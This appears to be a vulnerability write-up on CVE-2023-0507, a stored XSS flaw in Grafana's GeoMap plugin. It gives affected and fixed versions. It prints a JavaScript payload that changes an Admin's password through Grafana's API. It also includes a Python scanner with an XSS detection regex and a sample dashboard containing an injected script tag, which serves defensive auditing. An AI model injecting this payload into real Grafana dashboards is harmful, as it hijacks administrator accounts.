Grafana, a popular open-source platform for monitoring and observability, has a stored Cross-Site Scripting (XSS) vulnerability (CVE-2023-0507) in its core GeoMap plugin, affecting releases from the 8.1 branch onwards. The vulnerability allows an attacker to execute arbitrary JavaScript code in the browser of the currently authorized user of the Grafana instance. This means that a user with the Editor role can potentially escalate their privileges to those of the Admin role if an Admin user executes the malicious JavaScript code while viewing a dashboard. In this post, we'll discuss the details of this vulnerability, show a code snippet that demonstrates the potential exploit, and link to the original references.

Exploit Details

The stored XSS vulnerability in Grafana's GeoMap plugin was possible because map attributions were not properly sanitized, which allowed arbitrary JavaScript code to be injected into a panel and executed. An attacker needs the Editor role to change a panel so that it includes a map attribution containing the malicious JavaScript code. When that code runs in the browser of a user with the Admin role, it can potentially change the Admin user's password, thus escalating the attacker's privileges.

Code Snippet

Here's an example code snippet that demonstrates how the stored XSS vulnerability can be exploited:

// Malicious JavaScript code injected in the map attribution
<script>
    // Code to change password of user with Admin role
    var newPassword = "newAdminPassword"; // Replace with desired password
    var targetUsername = "admin"; // Replace with the targeted admin username

    // Post the form with the new password for the targeted admin user
    $.ajax({
        url: "/api/users/" + targetUsername + "/password",
        type: "PUT",
        dataType: "json",
        contentType: "application/json",
        data: JSON.stringify({ "newPassword": newPassword })
    }).done(function() {
        console.log("Password changed for user: " + targetUsername);
    });
</script>

Patch & Mitigation

Grafana has released fixed versions (8.5.21, 9.2.13, and 9.3.8) that address this vulnerability. Users are advised to upgrade to one of these versions to mitigate the risk of exploitation.
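Until the upgrade is done, dashboards saved by Editor-role users can be audited for this exact injection point. The following check is added here as an illustration and is not part of the original post or of Grafana's code: it walks an exported dashboard JSON, descends into collapsed rows, and flags any GeoMap layer whose attribution string carries markup. The JSON paths it reads (options.basemap and options.layers, each with config.attribution) are an assumption to verify against the panel JSON of your own Grafana version; the sample dashboard is constructed.

```python
import json
import re
from typing import Iterator

# Markup that should never appear in a map attribution: attributions are
# plain credit text, so a tag, an inline event handler or a javascript: URL
# is a sign of injected content.
SUSPICIOUS_MARKUP = re.compile(r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=|javascript:", re.IGNORECASE)

def iter_panels(panels: list) -> Iterator[dict]:
    """Yield every panel, descending into rows (collapsed rows nest panels)."""
    for panel in panels:
        yield panel
        yield from iter_panels(panel.get("panels", []))

def find_unsafe_attributions(dashboard: dict) -> list:
    """Return one finding per GeoMap layer whose attribution contains markup.
    Assumed layout: options.basemap and options.layers, each with config.attribution
    (an assumption; verify against your Grafana version's panel JSON)."""
    findings = []
    for panel in iter_panels(dashboard.get("panels", [])):
        if panel.get("type") != "geomap":
            continue
        options = panel.get("options", {})
        layers = [options.get("basemap", {})] + list(options.get("layers", []))
        for layer in layers:
            attribution = layer.get("config", {}).get("attribution", "")
            if isinstance(attribution, str) and SUSPICIOUS_MARKUP.search(attribution):
                findings.append({
                    "panel_id": panel.get("id"),
                    "panel_title": panel.get("title", ""),
                    "layer": layer.get("name") or layer.get("type", "?"),
                    "attribution": attribution,
                })
    return findings

# Constructed sample dashboard (not a real export): one clean basemap, one
# overlay with an injected tag, nested inside a collapsed row.
SAMPLE_DASHBOARD = json.loads("""
{"title": "Sites", "panels": [
  {"id": 1, "type": "row", "title": "Maps", "collapsed": true, "panels": [
    {"id": 2, "type": "geomap", "title": "Offices", "options": {
      "basemap": {"type": "xyz", "name": "Tiles", "config": {
        "url": "https://tiles.example/{z}/{x}/{y}.png", "attribution": "&copy; Example Tiles"}},
      "layers": [{"type": "xyz", "name": "Overlay", "config": {
        "attribution": "credit <script>alert(1)</script>"}}]}}]},
  {"id": 3, "type": "timeseries", "title": "CPU"}]}
""")
```

Run it over the output of the dashboard export API or the dashboards directory of a provisioned instance; any finding names the panel and layer an Admin should inspect before opening the dashboard.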

Original References

1. Grafana Release Notes - Fixed versions
2. CVE-2023-0507

Conclusion

The stored XSS vulnerability in Grafana's GeoMap plugin allows attackers with Editor roles to escalate their privileges if an Admin user executes the injected malicious JavaScript code while viewing a dashboard. To eliminate the risk of exploitation, users should upgrade their Grafana instances to versions 8.5.21, 9.2.13, or 9.3.8.

Timeline

Published on: 03/01/2023 16:15:00 UTC
Last modified on: 03/09/2023 01:08:00 UTC